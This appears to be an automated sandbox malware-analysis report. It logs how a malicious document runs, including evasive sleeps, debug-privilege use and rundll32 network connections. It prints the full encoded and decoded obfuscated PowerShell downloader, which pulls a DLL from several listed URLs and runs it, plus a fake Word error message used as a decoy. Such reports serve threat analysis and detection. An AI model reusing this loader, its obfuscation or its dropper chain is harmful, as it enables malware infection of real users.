Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\rundll32.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe Process information set: NOOPENFILEERRORBOX Jump to behavior

Malware Analysis System Evasion:

barindex
Contains long sleeps (>= 3 min)
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Thread delayed: delay time: 922337203685477 Jump to behavior
May sleep (evasive loops) to hinder dynamic analysis
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 1692 Thread sleep time: -922337203685477s >= -30000s Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe File Volume queried: C:\ FullSizeInformation Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe File Volume queried: C:\ FullSizeInformation Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Users\user Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Users\user\AppData Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Users\user\AppData\Roaming Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Users\user\AppData\Roaming\Microsoft Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Users\user\AppData\Roaming\Microsoft\Windows Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\desktop.ini Jump to behavior
Source: powershell.exe, 00000005.00000002.2097432715.00000000003A5000.00000004.00000020.sdmp Binary or memory string: \\?\IDE#CdRomNECVMWar_VMware_SATA_CD01_______________1.00____#6&373888b8&0&1.0.0#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{8a079453-cd11-11ea-a1d0-806e6f6e6963}#0000000000100000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{8a079453-cd11-11ea-a1d0-806e6f6e6963}#0000000006500000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}]
Source: rundll32.exe, 00000008.00000002.2121274122.000000000031D000.00000004.00000020.sdmp Binary or memory string: PPTP00VMware_S
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information queried: ProcessInformation Jump to behavior

Anti Debugging:

barindex
Contains functionality to read the PEB
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 7_2_1000A823 mov eax, dword ptr fs:[00000030h] 7_2_1000A823
Enables debug privileges
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process token adjusted: Debug Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe Memory protected: page execute read | page guard Jump to behavior

HIPS / PFW / Operating System Protection Evasion:

barindex
System process connects to network (likely due to code injection or exploit)
Source: C:\Windows\SysWOW64\rundll32.exe Network Connect: 115.21.224.117 80 Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe Network Connect: 195.159.28.230 144 Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe Network Connect: 162.241.204.233 144 Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe Network Connect: 69.38.130.14 80 Jump to behavior
Encrypted powershell cmdline option found
Source: unknown Process created: Base64 decoded Sv PB5o ([TYpE]("{2}{1}{5}{3}{0}{6}{4}" -F 'T','EM.I','SYsT','eC','y','o.DIR','OR') ) ; SEt-ITEm vARIaBLe:m7a9 ([typE]("{4}{2}{3}{5}{1}{6}{0}{7}" -f'n','ICEpOINtm','neT','.','sySteM.','sERv','A','aGer') ) ; $Ihv89_g=$M91G + [char](33) + $H23D;$D94M=(('P7'+'2')+'X'); (gET-variaBle pb5o -VA)::"crEaTedi`ReCt`oRY"($HOME + ((('9k'+'tNk')+'2'+'d'+('uhb9'+'kt'+'Gxlh')+('9i'+'a9kt'))."rE`PlaCe"(('9'+'kt'),'\')));$J87H=('S'+('36'+'N')); ( vaRIable M7a9 -VA )::"SEcuriTYp`RoToC`oL" = (('Tl'+'s')+'12');$X22U=('E'+('_'+'_E'));$P27pqe3 = ('E6'+'_R');$F39L=(('Q'+'94')+'W');$Ad1ra8n=$HOME+((('Ki'+'m')+('Nk2d'+'uhb')+'Ki'+'m'+('Gx'+'l')+'h9'+('i'+'aKi')+'m')-RePlace([CHAR]75+[CHAR]105+[CHAR]109),[CHAR]92)+$P27pqe3+'.d' + 'll';$V28U=('C8'+'8K');$Mriqd59='h' + 'tt' + 'p';$Kw3794x=('x '+'['+(' sh'+' ')+('b'+'://cab.my'+'kf')+'n.'+('com'+'/')+'a'+('d'+'min')+'/'+('X/'+'!')+'x'+(' '+'[ s')+'h'+(' b'+':')+('/'+'/bha')+'k'+'ti'+('vrind'+'.'+'com/c')+'g'+('i'+'-bin')+('/'+'JBbb'+'8'+'/!x [ ')+'sh'+(' b'+':')+('/'+'/van'+'ddna')+('bharg'+'a')+'ve'+('.c'+'o')+('m/ass'+'et')+'/W'+('9o'+'/')+'!'+'x '+'[ '+('s'+'h ')+('b:'+'/')+('/ie-'+'b'+'e')+('s'+'t.n')+'e'+('t/o'+'n'+'lin')+'e'+('-'+'timer'+'-')+('k'+'vh')+('xz'+'/i')+'l'+('X'+'L/!x')+(' [ s'+'h ')+('b:'+'/')+'/'+'g'+('oc'+'p'+'hon')+('gth'+'e')+('.com/'+'wp'+'-')+'co'+'nt'+('ent/'+'l')+'M'+('MC'+'/!')+('x '+'[ s')+('h'+' b://'+'ww')+'w'+('.l'+'e')+('t'+'sc')+'om'+'pa'+('r'+'eon')+('l'+'in')+('e'+'.c')+('om/d'+'e')+('.l'+'et')+'sc'+'
Source: C:\Windows\System32\cmd.exe Process created: Base64 decoded Sv PB5o ([TYpE]("{2}{1}{5}{3}{0}{6}{4}" -F 'T','EM.I','SYsT','eC','y','o.DIR','OR') ) ; SEt-ITEm vARIaBLe:m7a9 ([typE]("{4}{2}{3}{5}{1}{6}{0}{7}" -f'n','ICEpOINtm','neT','.','sySteM.','sERv','A','aGer') ) ; $Ihv89_g=$M91G + [char](33) + $H23D;$D94M=(('P7'+'2')+'X'); (gET-variaBle pb5o -VA)::"crEaTedi`ReCt`oRY"($HOME + ((('9k'+'tNk')+'2'+'d'+('uhb9'+'kt'+'Gxlh')+('9i'+'a9kt'))."rE`PlaCe"(('9'+'kt'),'\')));$J87H=('S'+('36'+'N')); ( vaRIable M7a9 -VA )::"SEcuriTYp`RoToC`oL" = (('Tl'+'s')+'12');$X22U=('E'+('_'+'_E'));$P27pqe3 = ('E6'+'_R');$F39L=(('Q'+'94')+'W');$Ad1ra8n=$HOME+((('Ki'+'m')+('Nk2d'+'uhb')+'Ki'+'m'+('Gx'+'l')+'h9'+('i'+'aKi')+'m')-RePlace([CHAR]75+[CHAR]105+[CHAR]109),[CHAR]92)+$P27pqe3+'.d' + 'll';$V28U=('C8'+'8K');$Mriqd59='h' + 'tt' + 'p';$Kw3794x=('x '+'['+(' sh'+' ')+('b'+'://cab.my'+'kf')+'n.'+('com'+'/')+'a'+('d'+'min')+'/'+('X/'+'!')+'x'+(' '+'[ s')+'h'+(' b'+':')+('/'+'/bha')+'k'+'ti'+('vrind'+'.'+'com/c')+'g'+('i'+'-bin')+('/'+'JBbb'+'8'+'/!x [ ')+'sh'+(' b'+':')+('/'+'/van'+'ddna')+('bharg'+'a')+'ve'+('.c'+'o')+('m/ass'+'et')+'/W'+('9o'+'/')+'!'+'x '+'[ '+('s'+'h ')+('b:'+'/')+('/ie-'+'b'+'e')+('s'+'t.n')+'e'+('t/o'+'n'+'lin')+'e'+('-'+'timer'+'-')+('k'+'vh')+('xz'+'/i')+'l'+('X'+'L/!x')+(' [ s'+'h ')+('b:'+'/')+'/'+'g'+('oc'+'p'+'hon')+('gth'+'e')+('.com/'+'wp'+'-')+'co'+'nt'+('ent/'+'l')+'M'+('MC'+'/!')+('x '+'[ s')+('h'+' b://'+'ww')+'w'+('.l'+'e')+('t'+'sc')+'om'+'pa'+('r'+'eon')+('l'+'in')+('e'+'.c')+('om/d'+'e')+('.l'+'et')+'sc'+' Jump to behavior
Creates a process in suspended mode (likely to inject code)
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\msg.exe msg user /v Word experienced an error trying to open the file. Jump to behavior
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -w hidden -enc IAAgAFMAdgAgACAAUABCADUAbwAgACAAKABbAFQAWQBwAEUAXQAoACIAewAyAH0AewAxAH0AewA1AH0AewAzAH0AewAwAH0AewA2AH0AewA0AH0AIgAgAC0ARgAgACcAVAAnACwAJwBFAE0ALgBJACcALAAnAFMAWQBzAFQAJwAsACcAZQBDACcALAAnAHkAJwAsACcAbwAuAEQASQBSACcALAAnAE8AUgAnACkAIAApACAAOwAgACAAUwBFAHQALQBJAFQARQBtACAAdgBBAFIASQBhAEIATABlADoAbQA3AGEAOQAgACgAWwB0AHkAcABFAF0AKAAiAHsANAB9AHsAMgB9AHsAMwB9AHsANQB9AHsAMQB9AHsANgB9AHsAMAB9AHsANwB9ACIAIAAtAGYAJwBuACcALAAnAEkAQwBFAHAATwBJAE4AdABtACcALAAnAG4AZQBUACcALAAnAC4AJwAsACcAcwB5AFMAdABlAE0ALgAnACwAJwBzAEUAUgB2ACcALAAnAEEAJwAsACcAYQBHAGUAcgAnACkAIAApACAAIAA7ACAAIAAkAEkAaAB2ADgAOQBfAGcAPQAkAE0AOQAxAEcAIAArACAAWwBjAGgAYQByAF0AKAAzADMAKQAgACsAIAAkAEgAMgAzAEQAOwAkAEQAOQA0AE0APQAoACgAJwBQADcAJwArACcAMgAnACkAKwAnAFgAJwApADsAIAAoAGcARQBUAC0AdgBhAHIAaQBhAEIAbABlACAAcABiADUAbwAgAC0AVgBBACkAOgA6ACIAYwByAEUAYQBUAGUAZABpAGAAUgBlAEMAdABgAG8AUgBZACIAKAAkAEgATwBNAEUAIAArACAAKAAoACgAJwA5AGsAJwArACcAdABOAGsAJwApACsAJwAyACcAKwAnAGQAJwArACgAJwB1AGgAYgA5ACcAKwAnAGsAdAAnACsAJwBHAHgAbABoACcAKQArACgAJwA5AGkAJwArACcAYQA5AGsAdAAnACkAKQAuACIAcgBFAGAAUABsAGEAQwBlACIAKAAoACcAOQAnACsAJwBrAHQAJwApACwAJwBcACcAKQApACkAOwAkAEoAOAA3AEgAPQAoACcAUwAnACsAKAAnADMANgAnACsAJwBOACcAKQApADsAIAAoACAAIAB2AGEAUgBJAGEAYgBsAGUAIAAgAE0ANwBhADkAIAAgAC0AVgBBACAAIAApADoAOgAiAFMARQBjAHUAcgBpAFQAWQBwAGAAUgBvAFQAbwBDAGAAbwBMACIAIAA9ACAAKAAoACcAVABsACcAKwAnAHMAJwApACsAJwAxADIAJwApADsAJABYADIAMgBVAD0AKAAnAEUAJwArACgAJwBfACcAKwAnAF8ARQAnACkAKQA7ACQAUAAyADcAcABxAGUAMwAgAD0AIAAoACcARQA2ACcAKwAnAF8AUgAnACkAOwAkAEYAMwA5AEwAPQAoACgAJwBRACcAKwAnADkANAAnACkAKwAnAFcAJwApADsAJABBAGQAMQByAGEAOABuAD0AJABIAE8ATQBFACsAKAAoACgAJwBLAGkAJwArACcAbQAnACkAKwAoACcATgBrADIAZAAnACsAJwB1AGgAYgAnACkAKwAnAEsAaQAnACsAJwBtACcAKwAoACcARwB4ACcAKwAnAGwAJwApACsAJwBoADkAJwArACgAJwBpACcAKwAnAGEASwBpACcAKQArACcAbQAnACkALQBSAGUAUABsAGEAYwBlACgAWwBDAEgAQQBSAF0ANwA1ACsAWwBDAEgAQQBSAF0AMQAwADUAKwBbAEMASABBAFIAXQAxADAAOQApACwAWwBDAEgAQQBSAF0AOQAyACkAKwAkAFAAMgA3AHAAcQBlADMAKwAnAC4AZAAnACAAKwAgACcAbABsACcAOwAkAFYAMgA4AFUAPQAoACcAQwA4ACcAKwAnADgASwAnACkAOwAkAE0AcgBpAHEAZAA1ADkAPQAnAGgAJwAgACsAIAAnAHQAdAAnACAAKwAgACcAcAAnADsAJABLAHcAMwA3ADkANAB4AD0AKAAnAHgAIAAnACsAJwBbACcAKwAoACcAIABzAGgAJwArACcAIAAnACkAKwAoACcAYgAnACsAJwA6AC8ALwBjAGEAYgAuAG0AeQAnACsAJwBrAGYAJwApACsAJwBuAC4AJwArACgAJwBjAG8AbQAnACsAJwAvACcAKQArACcAYQAnACsAKAAnAGQAJwArACcAbQBpAG4AJwApACsAJwAvACcAKwAoACcAWAAvACcAKwAnACEAJwApACsAJwB4ACcAKwAoACcAIAAnACsAJwBbACAAcwAnACkAKwAnAGgAJwArACgAJwAgAGIAJwArACcAOgAnACkAKwAoACcALwAnACsAJwAvAGIAaABhACcAKQArACcAawAnACsAJwB0AGkAJwArACgAJwB2AHIAaQBuAGQAJwArACcALgAnACsAJwBjAG8AbQAvAGMAJwApACsAJwBnACcAKwAoACcAaQAnACsAJwAtAGIAaQBuACcAKQArACgAJwAvACcAKwAnAEoAQgBiAGIAJwArACcAOAAnACsAJwAvACEAeAAgAFsAIAAnACkAKwAnAHMAaAAnACsAKAAnACAAYgAnACsAJwA6ACcAKQArACgAJwAvACcAKwAnAC8AdgBhAG4AJwArACcAZABkAG4AYQAnACkAKwAoACcAYgBoAGEAcgBnACcAKwAnAGEAJwApACsAJwB2AGUAJwArACgAJwAuAGMAJwArACcAbwAnACkAKwAoACcAbQAvAGEAcwBzACcAKwAnAGUAdAAnACkAKwAnAC8AVwAnACsAKAAnADkAbwAnACsAJwAvAC Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\System32\rundll32.exe 'C:\Windows\system32\rundll32.exe' C:\Users\user\Nk2duhb\Gxlh9ia\E6_R.dll AnyString Jump to behavior
Source: C:\Windows\System32\rundll32.exe Process created: C:\Windows\SysWOW64\rundll32.exe 'C:\Windows\system32\rundll32.exe' C:\Users\user\Nk2duhb\Gxlh9ia\E6_R.dll AnyString Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe Process created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWOW64\rundll32.exe 'C:\Users\user\Nk2duhb\Gxlh9ia\E6_R.dll',#1 Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe Process created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWOW64\rundll32.exe 'C:\Windows\SysWOW64\Dgmlr\ngcj.eda',hyhQYxhuLCMLb Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe Process created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWOW64\rundll32.exe 'C:\Windows\SysWOW64\Dgmlr\ngcj.eda',#1 Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe Process created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWOW64\rundll32.exe 'C:\Windows\SysWOW64\Zfrhfthwazxcccc\whpjzcoocbdvfd.agu',nCbdzah Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe Process created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWOW64\rundll32.exe 'C:\Windows\SysWOW64\Zfrhfthwazxcccc\whpjzcoocbdvfd.agu',#1 Jump to behavior
Very long cmdline option found, this is very uncommon (may be encrypted or packed)
Source: unknown Process created: C:\Windows\System32\cmd.exe cmd cmd /c m^s^g %username% /v Wo^rd exp^erien^ced an er^ror tryi^ng to op^en th^e fi^le. & p^owe^rs^he^ll^ -w hi^dd^en -^e^nc IAAgAFMAdgAgACAAUABCADUAbwAgACAAKABbAFQAWQBwAEUAXQAoACIAewAyAH0AewAxAH0AewA1AH0AewAzAH0AewAwAH0AewA2AH0AewA0AH0AIgAgAC0ARgAgACcAVAAnACwAJwBFAE0ALgBJACcALAAnAFMAWQBzAFQAJwAsACcAZQBDACcALAAnAHkAJwAsACcAbwAuAEQASQBSACcALAAnAE8AUgAnACkAIAApACAAOwAgACAAUwBFAHQALQBJAFQARQBtACAAdgBBAFIASQBhAEIATABlADoAbQA3AGEAOQAgACgAWwB0AHkAcABFAF0AKAAiAHsANAB9AHsAMgB9AHsAMwB9AHsANQB9AHsAMQB9AHsANgB9AHsAMAB9AHsANwB9ACIAIAAtAGYAJwBuACcALAAnAEkAQwBFAHAATwBJAE4AdABtACcALAAnAG4AZQBUACcALAAnAC4AJwAsACcAcwB5AFMAdABlAE0ALgAnACwAJwBzAEUAUgB2ACcALAAnAEEAJwAsACcAYQBHAGUAcgAnACkAIAApACAAIAA7ACAAIAAkAEkAaAB2ADgAOQBfAGcAPQAkAE0AOQAxAEcAIAArACAAWwBjAGgAYQByAF0AKAAzADMAKQAgACsAIAAkAEgAMgAzAEQAOwAkAEQAOQA0AE0APQAoACgAJwBQADcAJwArACcAMgAnACkAKwAnAFgAJwApADsAIAAoAGcARQBUAC0AdgBhAHIAaQBhAEIAbABlACAAcABiADUAbwAgAC0AVgBBACkAOgA6ACIAYwByAEUAYQBUAGUAZABpAGAAUgBlAEMAdABgAG8AUgBZACIAKAAkAEgATwBNAEUAIAArACAAKAAoACgAJwA5AGsAJwArACcAdABOAGsAJwApACsAJwAyACcAKwAnAGQAJwArACgAJwB1AGgAYgA5ACcAKwAnAGsAdAAnACsAJwBHAHgAbABoACcAKQArACgAJwA5AGkAJwArACcAYQA5AGsAdAAnACkAKQAuACIAcgBFAGAAUABsAGEAQwBlACIAKAAoACcAOQAnACsAJwBrAHQAJwApACwAJwBcACcAKQApACkAOwAkAEoAOAA3AEgAPQAoACcAUwAnACsAKAAnADMANgAnACsAJwBOACcAKQApADsAIAAoACAAIAB2AGEAUgBJAGEAYgBsAGUAIAAgAE0ANwBhADkAIAAgAC0AVgBBACAAIAApADoAOgAiAFMARQBjAHUAcgBpAFQAWQBwAGAAUgBvAFQAbwBDAGAAbwBMACIAIAA9ACAAKAAoACcAVABsACcAKwAnAHMAJwApACsAJwAxADIAJwApADsAJABYADIAMgBVAD0AKAAnAEUAJwArACgAJwBfACcAKwAnAF8ARQAnACkAKQA7ACQAUAAyADcAcABxAGUAMwAgAD0AIAAoACcARQA2ACcAKwAnAF8AUgAnACkAOwAkAEYAMwA5AEwAPQAoACgAJwBRACcAKwAnADkANAAnACkAKwAnAFcAJwApADsAJABBAGQAMQByAGEAOABuAD0AJABIAE8ATQBFACsAKAAoACgAJwBLAGkAJwArACcAbQAnACkAKwAoACcATgBrADIAZAAnACsAJwB1AGgAYgAnACkAKwAnAEsAaQAnACsAJwBtACcAKwAoACcARwB4ACcAKwAnAGwAJwApACsAJwBoADkAJwArACgAJwBpACcAKwAnAGEASwBpACcAKQArACcAbQAnACkALQBSAGUAUABsAGEAYwBlACgAWwBDAEgAQQBSAF0ANwA1ACsAWwBDAEgAQQBSAF0AMQAwADUAKwBbAEMASABBAFIAXQAxADAAOQApACwAWwBDAEgAQQBSAF0AOQAyACkAKwAkAFAAMgA3AHAAcQBlADMAKwAnAC4AZAAnACAAKwAgACcAbABsACcAOwAkAFYAMgA4AFUAPQAoACcAQwA4ACcAKwAnADgASwAnACkAOwAkAE0AcgBpAHEAZAA1ADkAPQAnAGgAJwAgACsAIAAnAHQAdAAnACAAKwAgACcAcAAnADsAJABLAHcAMwA3ADkANAB4AD0AKAAnAHgAIAAnACsAJwBbACcAKwAoACcAIABzAGgAJwArACcAIAAnACkAKwAoACcAYgAnACsAJwA6AC8ALwBjAGEAYgAuAG0AeQAnACsAJwBrAGYAJwApACsAJwBuAC4AJwArACgAJwBjAG8AbQAnACsAJwAvACcAKQArACcAYQAnACsAKAAnAGQAJwArACcAbQBpAG4AJwApACsAJwAvACcAKwAoACcAWAAvACcAKwAnACEAJwApACsAJwB4ACcAKwAoACcAIAAnACsAJwBbACAAcwAnACkAKwAnAGgAJwArACgAJwAgAGIAJwArACcAOgAnACkAKwAoACcALwAnACsAJwAvAGIAaABhACcAKQArACcAawAnACsAJwB0AGkAJwArACgAJwB2AHIAaQBuAGQAJwArACcALgAnACsAJwBjAG8AbQAvAGMAJwApACsAJwBnACcAKwAoACcAaQAnACsAJwAtAGIAaQBuACcAKQArACgAJwAvACcAKwAnAEoAQgBiAGIAJwArACcAOAAnACsAJwAvACEAeAAgAFsAIAAnACkAKwAnAHMAaAAnACsAKAAnACAAYgAnACsAJwA6ACcAKQArACgAJwAvACcAKwAnAC8AdgBhAG4AJwArACcAZABkAG4AYQAnACkAKwAoACcAYgBoAGEAcgBnACcAKwAnAGEAJwApACsAJwB2AGUAJwArACgAJwAuAGMAJwArACcAbwAnACkAKwAoACcA
Source: unknown Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -w hidden -enc IAAgAFMAdgAgACAAUABCADUAbwAgACAAKABbAFQAWQBwAEUAXQAoACIAewAyAH0AewAxAH0AewA1AH0AewAzAH0AewAwAH0AewA2AH0AewA0AH0AIgAgAC0ARgAgACcAVAAnACwAJwBFAE0ALgBJACcALAAnAFMAWQBzAFQAJwAsACcAZQBDACcALAAnAHkAJwAsACcAbwAuAEQASQBSACcALAAnAE8AUgAnACkAIAApACAAOwAgACAAUwBFAHQALQBJAFQARQBtACAAdgBBAFIASQBhAEIATABlADoAbQA3AGEAOQAgACgAWwB0AHkAcABFAF0AKAAiAHsANAB9AHsAMgB9AHsAMwB9AHsANQB9AHsAMQB9AHsANgB9AHsAMAB9AHsANwB9ACIAIAAtAGYAJwBuACcALAAnAEkAQwBFAHAATwBJAE4AdABtACcALAAnAG4AZQBUACcALAAnAC4AJwAsACcAcwB5AFMAdABlAE0ALgAnACwAJwBzAEUAUgB2ACcALAAnAEEAJwAsACcAYQBHAGUAcgAnACkAIAApACAAIAA7ACAAIAAkAEkAaAB2ADgAOQBfAGcAPQAkAE0AOQAxAEcAIAArACAAWwBjAGgAYQByAF0AKAAzADMAKQAgACsAIAAkAEgAMgAzAEQAOwAkAEQAOQA0AE0APQAoACgAJwBQADcAJwArACcAMgAnACkAKwAnAFgAJwApADsAIAAoAGcARQBUAC0AdgBhAHIAaQBhAEIAbABlACAAcABiADUAbwAgAC0AVgBBACkAOgA6ACIAYwByAEUAYQBUAGUAZABpAGAAUgBlAEMAdABgAG8AUgBZACIAKAAkAEgATwBNAEUAIAArACAAKAAoACgAJwA5AGsAJwArACcAdABOAGsAJwApACsAJwAyACcAKwAnAGQAJwArACgAJwB1AGgAYgA5ACcAKwAnAGsAdAAnACsAJwBHAHgAbABoACcAKQArACgAJwA5AGkAJwArACcAYQA5AGsAdAAnACkAKQAuACIAcgBFAGAAUABsAGEAQwBlACIAKAAoACcAOQAnACsAJwBrAHQAJwApACwAJwBcACcAKQApACkAOwAkAEoAOAA3AEgAPQAoACcAUwAnACsAKAAnADMANgAnACsAJwBOACcAKQApADsAIAAoACAAIAB2AGEAUgBJAGEAYgBsAGUAIAAgAE0ANwBhADkAIAAgAC0AVgBBACAAIAApADoAOgAiAFMARQBjAHUAcgBpAFQAWQBwAGAAUgBvAFQAbwBDAGAAbwBMACIAIAA9ACAAKAAoACcAVABsACcAKwAnAHMAJwApACsAJwAxADIAJwApADsAJABYADIAMgBVAD0AKAAnAEUAJwArACgAJwBfACcAKwAnAF8ARQAnACkAKQA7ACQAUAAyADcAcABxAGUAMwAgAD0AIAAoACcARQA2ACcAKwAnAF8AUgAnACkAOwAkAEYAMwA5AEwAPQAoACgAJwBRACcAKwAnADkANAAnACkAKwAnAFcAJwApADsAJABBAGQAMQByAGEAOABuAD0AJABIAE8ATQBFACsAKAAoACgAJwBLAGkAJwArACcAbQAnACkAKwAoACcATgBrADIAZAAnACsAJwB1AGgAYgAnACkAKwAnAEsAaQAnACsAJwBtACcAKwAoACcARwB4ACcAKwAnAGwAJwApACsAJwBoADkAJwArACgAJwBpACcAKwAnAGEASwBpACcAKQArACcAbQAnACkALQBSAGUAUABsAGEAYwBlACgAWwBDAEgAQQBSAF0ANwA1ACsAWwBDAEgAQQBSAF0AMQAwADUAKwBbAEMASABBAFIAXQAxADAAOQApACwAWwBDAEgAQQBSAF0AOQAyACkAKwAkAFAAMgA3AHAAcQBlADMAKwAnAC4AZAAnACAAKwAgACcAbABsACcAOwAkAFYAMgA4AFUAPQAoACcAQwA4ACcAKwAnADgASwAnACkAOwAkAE0AcgBpAHEAZAA1ADkAPQAnAGgAJwAgACsAIAAnAH